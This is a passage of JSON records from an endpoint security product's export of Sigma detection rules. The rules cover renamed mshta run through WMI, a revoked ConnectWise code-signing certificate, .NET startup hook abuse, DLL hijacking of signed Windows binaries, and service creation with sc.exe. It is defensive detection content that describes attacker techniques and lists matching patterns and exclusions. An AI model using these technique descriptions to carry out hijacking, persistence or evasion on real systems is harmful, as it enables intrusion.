"effective_state": "alert", + "rule_effective_level": "critical", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.604309Z", + "creation_date": "2026-03-23T11:45:34.604312Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.604320Z", + "rule_level": "critical", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://unit42.paloaltonetworks.com/valak-evolution/", + "https://twitter.com/ForensicITGuy/status/1334734244120309760", + "https://app.any.run/tasks/6e90f38e-8b34-4e12-9a33-3bc5e3b4d81e/" + ], + "name": "t1047_group_ta551_wmi_renamed_mshta.yml", + "content": "title: Possible Lateral Movement via Renamed MSHTA through WMI\nid: 254f2253-5e75-41de-a4fb-bbfa86c1a831\ndescription: |\n Detects when a renamed mshta.exe binary is executed by WMI (child of wmiprvse).\n This technique is heavily used by the TA551 group actor when executing a malicious payload received by spear phishing campaigns.\n It is recommended to investigate the origin of this execution through the authentication telemetry and to analyze child processes to look for malicious content or actions.\nreferences:\n - https://unit42.paloaltonetworks.com/valak-evolution/\n - https://twitter.com/ForensicITGuy/status/1334734244120309760\n - https://app.any.run/tasks/6e90f38e-8b34-4e12-9a33-3bc5e3b4d81e/\ndate: 2020/12/08\nmodified: 2025/03/06\nauthor: HarfangLab\ntags:\n - 
attack.execution\n - attack.t1047\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Mshta\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ParentImage|endswith: '\\wmiprvse.exe'\n OriginalFileName: 'MSHTA.EXE'\n\n filter_image:\n Image|endswith: '\\mshta.exe'\n\n condition: selection and not 1 of filter_*\nlevel: critical\n# level: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "254f2253-5e75-41de-a4fb-bbfa86c1a831", + "rule_name": "Possible Lateral Movement via Renamed MSHTA through WMI", + "rule_description": "Detects when a renamed mshta.exe binary is executed by WMI (child of wmiprvse).\nThis technique is heavily used by the TA551 group actor when executing a malicious payload received by spear phishing campaigns.\nIt is recommended to investigate the origin of this execution through the authentication telemetry and to analyze child processes to look for malicious content or actions.\n", + "rule_creation_date": "2020-12-08", + "rule_modified_date": "2025-03-06", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.execution" + ], + "rule_technique_tags": [ + "attack.t1047" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2557816c-987b-4020-8958-02526e2e549b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.096803Z", + "creation_date": "2026-03-23T11:45:34.096805Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.096809Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.gdatasoftware.com/blog/2025/06/38218-connectwise-abuse-malware", + "https://x.com/smica83/status/1977489233712717894", + "https://attack.mitre.org/techniques/T1553/002/" + ], + "name": "t1553_002_connectwise_revoked_certificate.yml", + "content": "title: Process Executed Signed with Connectwise Revoked Certificate\nid: 2557816c-987b-4020-8958-02526e2e549b\ndescription: |\n Detects the execution of a process signed using the Connectwise revoked certificate.\n This certificate has been revoked because it was abused by threat actors to sign malicious ConnectWise binaries.\n Since March 2025, threat actors have been abusing validly signed ConnectWise binaries by embedding custom malicious content via Authenticode stuffing without breaking the signature.\n It is recommended to investigate the process to determine its legitimacy.\nreferences:\n - https://www.gdatasoftware.com/blog/2025/06/38218-connectwise-abuse-malware\n - https://x.com/smica83/status/1977489233712717894\n - https://attack.mitre.org/techniques/T1553/002/\ndate: 2025/10/13\nmodified: 2025/10/22\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.StolenCertificate\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n 
product: windows\ndetection:\n selection:\n ProcessSignatureSignerThumbprint: '4c2272fba7a7380f55e2a424e9e624aee1c14579'\n\n # Using Connectwise revoked certificate but not malicious\n exclusion_image:\n ProcessImage:\n - '?:\\Program Files (x86)\\ScreenConnect Client (????????????????)\\ScreenConnect.ClientService.exe'\n - '?:\\Program Files (x86)\\ScreenConnect Client (????????????????)\\ScreenConnect.WindowsClient.exe'\n - '?:\\Program Files (x86)\\ScreenConnect\\Bin\\ScreenConnect.Service.exe'\n - '?:\\Windows\\LTSvc\\LTSVC.exe'\n - '?:\\Windows\\LTSvc\\LTTray.exe'\n - '?:\\Windows\\LTSvc\\LTSvcMon.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Apps\\\\*\\\\????????.???\\\\????????.???\\\\*\\ScreenConnect.ClientService.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Apps\\\\*\\\\????????.???\\\\????????.???\\\\*\\ScreenConnect.WindowsClient.exe'\n - '?:\\Program Files (x86)\\SAAZOD\\\\*'\n - '?:\\Program Files (x86)\\ITSPlatform\\\\*'\n - '*\\STAGO\\Stago.Psad.Client\\ScreenConnect\\ScreenConnect.ClientService.exe'\n - '*\\STAGO\\Stago.Psad.Client\\ScreenConnect\\ScreenConnect.WindowsClient.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2557816c-987b-4020-8958-02526e2e549b", + "rule_name": "Process Executed Signed with Connectwise Revoked Certificate", + "rule_description": "Detects the execution of a process signed using the Connectwise revoked certificate.\nThis certificate has been revoked because it was abused by threat actors to sign malicious ConnectWise binaries.\nSince March 2025, threat actors have been abusing validly signed ConnectWise binaries by embedding custom malicious content via Authenticode stuffing without breaking the signature.\nIt is recommended to investigate the process to determine its legitimacy.\n", + "rule_creation_date": "2025-10-13", + "rule_modified_date": "2025-10-22", + "rule_os": "windows", 
+ "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1553.002" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2580b2f9-373b-4a4c-9b57-13e458627130", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.098306Z", + "creation_date": "2026-03-23T11:45:34.098308Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.098312Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md#atomic-test-2---dll-side-loading-using-the-dotnet-startup-hook-environment-variable", + "https://medium.com/criteo-engineering/c-have-some-fun-with-net-core-startup-hooks-498b9ad001e1", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_sideloading_dotnet_startup_hook.yml", + "content": "title: Dotnet Startup Hook Environment Variable Set\nid: 2580b2f9-373b-4a4c-9b57-13e458627130\ndescription: |\n Detects the registration of a dotnet startup hook using the DOTNET_STARTUP_HOOKS environment variable.\n 
Adversaries can register a malicious assembly that will be executed whenever a .net core application is started.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md#atomic-test-2---dll-side-loading-using-the-dotnet-startup-hook-environment-variable\n - https://medium.com/criteo-engineering/c-have-some-fun-with-net-core-startup-hooks-498b9ad001e1\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/12/23\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'Cmd.EXE'\n CommandLine|contains|all:\n - 'set '\n - 'DOTNET_STARTUP_HOOKS='\n\n condition: selection\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2580b2f9-373b-4a4c-9b57-13e458627130", + "rule_name": "Dotnet Startup Hook Environment Variable Set", + "rule_description": "Detects the registration of a dotnet startup hook using the DOTNET_STARTUP_HOOKS environment variable.\nAdversaries can register a malicious assembly that will be executed whenever a .net core application is started.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2022-12-23", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + 
"attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "258b150d-0fe4-48e0-93bc-09d02567ecb8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.592069Z", + "creation_date": "2026-03-23T11:45:34.592072Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.592080Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_microsoftedgesh.yml", + "content": "title: DLL Hijacking via microsoftedgesh.exe\nid: 258b150d-0fe4-48e0-93bc-09d02567ecb8\ndescription: |\n Detects potential Windows DLL Hijacking via microsoftedgesh.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 
or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'microsoftedgesh.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\USERENV.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "258b150d-0fe4-48e0-93bc-09d02567ecb8", + "rule_name": "DLL Hijacking via microsoftedgesh.exe", + "rule_description": "Detects potential Windows DLL Hijacking via microsoftedgesh.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the 
malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "25bdc370-c782-4157-b467-3e74718d8b59", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "low", + "rule_effective_confidence": "weak", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.074695Z", + "creation_date": "2026-03-23T11:45:34.074697Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.074702Z", + "rule_level": "low", + "rule_confidence": "weak", + "rule_confidence_override": null, + "references": [ + "https://attack.mitre.org/techniques/T1543/003/" + ], + "name": "t1543_003_manual_service_creation_with_sc.yml", + "content": "title: Service Created via sc.exe\nid: 25bdc370-c782-4157-b467-3e74718d8b59\ndescription: |\n Detects the manual creation of a Windows service using 
sc.exe.\n While sc.exe is a legitimate Windows tool for managing services, its manual use outside of an installer can indicate adversaries may be creating a Windows service to achieve persistence.\n It is recommended to investigate suspicious service creation events through sc.exe, specially if they are not part of an installation process, and validate the service binary path and account privileges.\nreferences:\n - https://attack.mitre.org/techniques/T1543/003/\ndate: 2022/12/02\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.persistence\n - attack.t1543.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Sc\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.ServiceCreation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'sc.exe'\n CommandLine|contains|all:\n - ' create'\n - 'binPath='\n\n exclusion_logisync:\n GrandparentImage:\n - '?:\\Program Files (x86)\\Logitech\\LogiSync\\sync-agent\\LogiSyncHandler.exe'\n - '?:\\Program Files\\Logitech\\LogiSync\\sync-agent\\LogiSyncHandler.exe'\n\n exclusion_intel:\n CurrentDirectory|startswith:\n - '?:\\Program Files\\Intel\\'\n - '?:\\Program Files (x86)\\Intel\\'\n\n exclusion_installer:\n GrandparentImage:\n - '?:\\Windows\\SysWOW64\\msiexec.exe'\n - '?:\\Windows\\System32\\msiexec.exe'\n\n exclusion_listary:\n CommandLine|contains: ' ListaryService'\n\n exclusion_webcompanion:\n ParentImage|endswith: '\\WebCompanionInstaller.exe'\n\n exclusion_parsec:\n GrandparentImage|endswith: '\\parsec-windows.exe'\n\n exclusion_autodesk:\n GrandparentImage|endswith: '\\AdODIS-installer.exe'\n\n exclusion_dell:\n GrandparentImage|endswith: '\\invcol.exe'\n\n exclusion_hp:\n ParentImage:\n - '?:\\Program Files\\HP\\HP Touchpoint Analytics Client Installer\\TAInstaller.exe'\n - '?:\\Program Files (x86)\\HP\\HP Touchpoint Analytics Client 
Installer\\TAInstaller.exe'\n - '?:\\Program Files\\Hewlett-Packard\\HP Touchpoint Manager\\Tools\\tainstaller.exe'\n - '?:\\Program Files (x86)\\Hewlett-Packard\\HP Touchpoint Manager\\Tools\\tainstaller.exe'\n\n exclusion_varian:\n CommandLine|contains: 'create VarianVDTRSDAgent binPath= *VMS.RemoteASD.VDTAgent.exe'\n ParentImage: '?:\\ProgramData\\VDT.exe'\n\n exclusion_asus_removetool:\n GrandparentImage: '?:\\Program Files\\ASUS\\ABM\\service\\RemoveTool.exe'\n\n exclusion_nable:\n ParentImage: '?:\\Program Files (x86)\\N-able Technologies\\Windows Agent\\bin\\agent.exe'\n CommandLine|contains: 'sc.exe create AutomationManagerAgent start= auto displayName= Automation Manager Agent binPath= ??:\\Program Files (x86)\\N-Able Technologies\\AutomationManagerAgent\\AutomationManager.AgentService.exe?'\n\n exclusion_trendmicro:\n ParentImage: '?:\\Program Files\\Trend Micro\\Deep Security Agent\\dsa.exe'\n CommandLine|contains: 'sc.exe create ds_nuagent start= disabled binpath= ??:\\Program Files\\Trend Micro\\Deep Security Agent\\nuagent\\ds_nuagent.exe?'\n\n exclusion_totalav:\n ParentImage: '?:\\Program Files (x86)\\TotalAV\\SecurityService.exe'\n CommandLine|contains: 'sc create ProtectedELAM binpath= ?:\\WINDOWS\\system32\\drivers\\protected_elam.sys'\n\n exclusion_mcafee:\n ParentImage:\n - '?:\\Program Files\\Common Files\\McAfee\\PEF\\Installer\\InstallPEF.exe'\n - '?:\\Program Files\\McAfee\\Temp??????????\\installer.exe'\n CommandLine|contains:\n - 'SC.exe create PEFService start= auto binpath= ??:\\Program Files\\Common Files\\McAfee\\PEF\\CORE\\PEFService.exe? DisplayName= McAfee PEF Service'\n - 'sc.exe create McAfee WebAdvisor binPath= ??:\\Program Files\\McAfee\\WebAdvisor\\ServiceHost.exe? 
start= auto DisplayName= McAfee WebAdvisor'\n\n exclusion_huawei:\n ParentImage:\n - '?:\\ProgramData\\Comms\\PCManager\\DriverUpgrade\\Update\\Downloaded\\\\*\\PCManager_Setup_*_x64.exe'\n - '?:\\Program Files\\Huawei\\PCManager\\AccessoryCenter_Setup.exe'\n - '?:\\Program Files\\Huawei\\PCManager\\BasicService_Setup.exe'\n - '?:\\Program Files\\Huawei\\PCManager\\HiviewService_Setup.exe'\n - '?:\\Program Files\\Huawei\\PCManager\\LCDEnhancement_step.exe'\n - '*\\MSPCManagerOffline.exe'\n CommandLine|contains:\n - 'sc.exe create HiConnectivityService DisplayName= Huawei Connectivity Windows Service start= auto binPath= ??:\\Program Files\\Huawei\\PCManager\\HiConnectivityService.exe?'\n - 'sc.exe create HiviewService DisplayName= Huawei Hiview Windows Service start= auto binPath= ??:\\Program Files\\Huawei\\Hiview\\HiviewService.exe?'\n - 'sc.exe create HwDistributedMainService DisplayName= Huawei Distributed Windows Service start= auto binPath= ??:\\Program Files\\Huawei\\PCManager\\HwDistributedMainService.exe?'\n - 'sc.exe create HwPCCoreService DisplayName= Huawei PC Core Service start= auto binPath= ??:\\Program Files\\Huawei\\BasicService\\BasicService.exe?'\n - 'sc.exe create LCD_Service DisplayName= Huawei LCD_Service start= auto binPath= ??:\\Program Files\\Huawei\\HwLcdEnhancement\\LCD_Service.exe?'\n - 'sc.exe create MBAMainService DisplayName= Huawei PCManager Windows Service start= auto binPath= ??:\\Program Files\\Huawei\\PCManager\\MateBookService.exe?'\n - 'sc.exe create PCManager Service start= auto binpath=?:\\Program Files\\Microsoft PC Manager\\MSPCManagerService.exe'\n\n exclusion_panda:\n GrandparentCommandLine:\n - '?:\\WINDOWS\\system32\\cmd.exe /c ?:\\Program Files (x86)\\Panda Cloud Systems Management\\UltraVNC\\vnc_configure.cmd ?:\\Program Files (x86)\\Panda Cloud Systems Management\\UltraVNC\\winvnc.exe'\n - '?:\\Program Files (x86)\\Panda Cloud Systems Management\\CagService.exe'\n CommandLine:\n - 'SC create uvnc_service binpath= 
??:\\Program Files (x86)\\Panda Cloud Systems Management\\UltraVNC\\winvnc.exe? -service start= auto'\n - 'SC create uvnc_service binpath= ??:\\Program Files (x86)\\Panda Systems Management\\UltraVNC\\winvnc.exe? -service start= auto'\n\n exclusion_centrastage:\n GrandparentImage: '?:\\Program Files (x86)\\CentraStage\\CagService.exe'\n CommandLine: 'SC create uvnc_service binpath= ??:\\Program Files (x86)\\CentraStage\\UltraVNC\\winvnc.exe? -service start= auto'\n\n exclusion_alienware:\n GrandparentImage: '?:\\Program Files\\Alienware\\Alienware Command Center\\OCControlService\\OCControl.Service.exe'\n CommandLine: 'sc create AMDRyzenMasterDriverV?? binPath= ?:\\Program Files\\Alienware\\AMDRyzenMasterDriver\\bin\\AMDRyzenMasterDriver.sys type= kernel start= auto'\n\n exclusion_rustdesk:\n CommandLine: 'sc create RustDesk binpath= \"?:\\Program Files\\RustDesk\\RustDesk.exe\" * start= auto DisplayName= RustDesk Service'\n ParentCommandLine:\n - '?:\\Windows\\System32\\cmd.exe /C ?:\\WINDOWS\\TEMP\\RustDesk_install.bat'\n - '?:\\Windows\\System32\\cmd.exe /C ?:\\Windows\\SystemTemp\\RustDesk_install.bat'\n - '?:\\Windows\\System32\\cmd.exe /C ?:\\Users\\\\*\\AppData\\Local\\Temp\\RustDesk_install.bat'\n\n exclusion_heat:\n CommandLine:\n - '?:\\Windows\\system32\\sc.exe create gzflt type= filesys displayname= gzflt start= demand binPath= ?:\\Windows\\system32\\drivers\\gzflt.sys depend= FltMgr group= FSFilter Anti-Virus tag= yes'\n - '?:\\Windows\\system32\\sc.exe create Trufos type= filesys displayname= Trufos start= demand binPath= ?:\\Windows\\system32\\drivers\\trufos.sys depend= FltMgr group= Boot Bus Extender tag= yes'\n GrandparentImage: '?:\\Program Files\\HEAT Software\\EMSSAgent\\\\??\\luarunner.exe'\n\n exclusion_mspecosystem:\n CommandLine:\n - '?:\\WINDOWS\\system32\\sc.exe create EcosystemAgentMaintenance start= auto DisplayName= Ecosystem Agent Maintenance binPath= ?:\\Program Files (x86)\\SolarWinds MSP\\Ecosystem 
Agent\\SolarWinds.MSP.Ecosystem.WindowsAgentMaint.exe'\n - '?:\\WINDOWS\\system32\\sc.exe create EcosystemAgent start= auto DisplayName= Ecosystem Agent binPath= ?:\\Program Files (x86)\\SolarWinds MSP\\Ecosystem Agent\\SolarWinds.MSP.Ecosystem.WindowsAgent.exe'\n - '?:\\WINDOWS\\system32\\sc.exe create EcosystemAgentMaintenance start= auto DisplayName= Ecosystem Agent Maintenance binPath= ?:\\Program Files (x86)\\N-able Technologies\\Ecosystem Agent\\Nable.Ecosystem.WindowsAgentMaint.exe'\n - '?:\\WINDOWS\\system32\\sc.exe create EcosystemAgent start= auto DisplayName= Ecosystem Agent binPath= ?:\\Program Files (x86)\\N-able Technologies\\Ecosystem Agent\\Nable.Ecosystem.WindowsAgent.exe'\n GrandparentImage: '?:\\ProgramData\\MSPEcosystem\\FileCache\\Upgrade\\Ecosystem.AgentSetup.exe'\n\n exclusion_admincenter:\n CommandLine|contains: 'binpath= ?:\\Program Files\\WindowsAdminCenter\\Service\\'\n ProcessGrandparentInternalName: 'Windows Admin Center (v2)'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'Microsoft Corporation'\n\n exclusion_matrix42:\n CommandLine|contains: 'binPath= \"?:\\Program Files\\Matrix42\\Maintenance Service\\Matrix42MaintenanceService.exe\"'\n ParentCommandLine|contains: 'Packages\\Matrix42\\UEM Agent Windows\\'\n\n exclusion_puppet_agent:\n ParentImage: '?:\\Program Files\\Puppet Labs\\\\*\\bin\\ruby.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\n#level: medium\nconfidence: weak\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "25bdc370-c782-4157-b467-3e74718d8b59", + "rule_name": "Service Created via sc.exe", + "rule_description": "Detects the manual creation of a Windows service using sc.exe.\nWhile sc.exe is a legitimate Windows tool for managing services, its manual use outside of an installer can indicate adversaries may be creating a Windows service to achieve persistence.\nIt is recommended to investigate suspicious service creation 
events through sc.exe, specially if they are not part of an installation process, and validate the service binary path and account privileges.\n", + "rule_creation_date": "2022-12-02", + "rule_modified_date": "2025-04-15", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1543.003" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "25c7fcff-2700-4b0e-81d3-c467def3ef7e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.095213Z", + "creation_date": "2026-03-23T11:45:34.095215Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.095219Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_systempropertiesremote.yml", + "content": "title: DLL Hijacking via systempropertiesremote.exe\nid: 
25c7fcff-2700-4b0e-81d3-c467def3ef7e\ndescription: |\n Detects potential Windows DLL Hijacking via systempropertiesremote.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'systempropertiesremote.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": 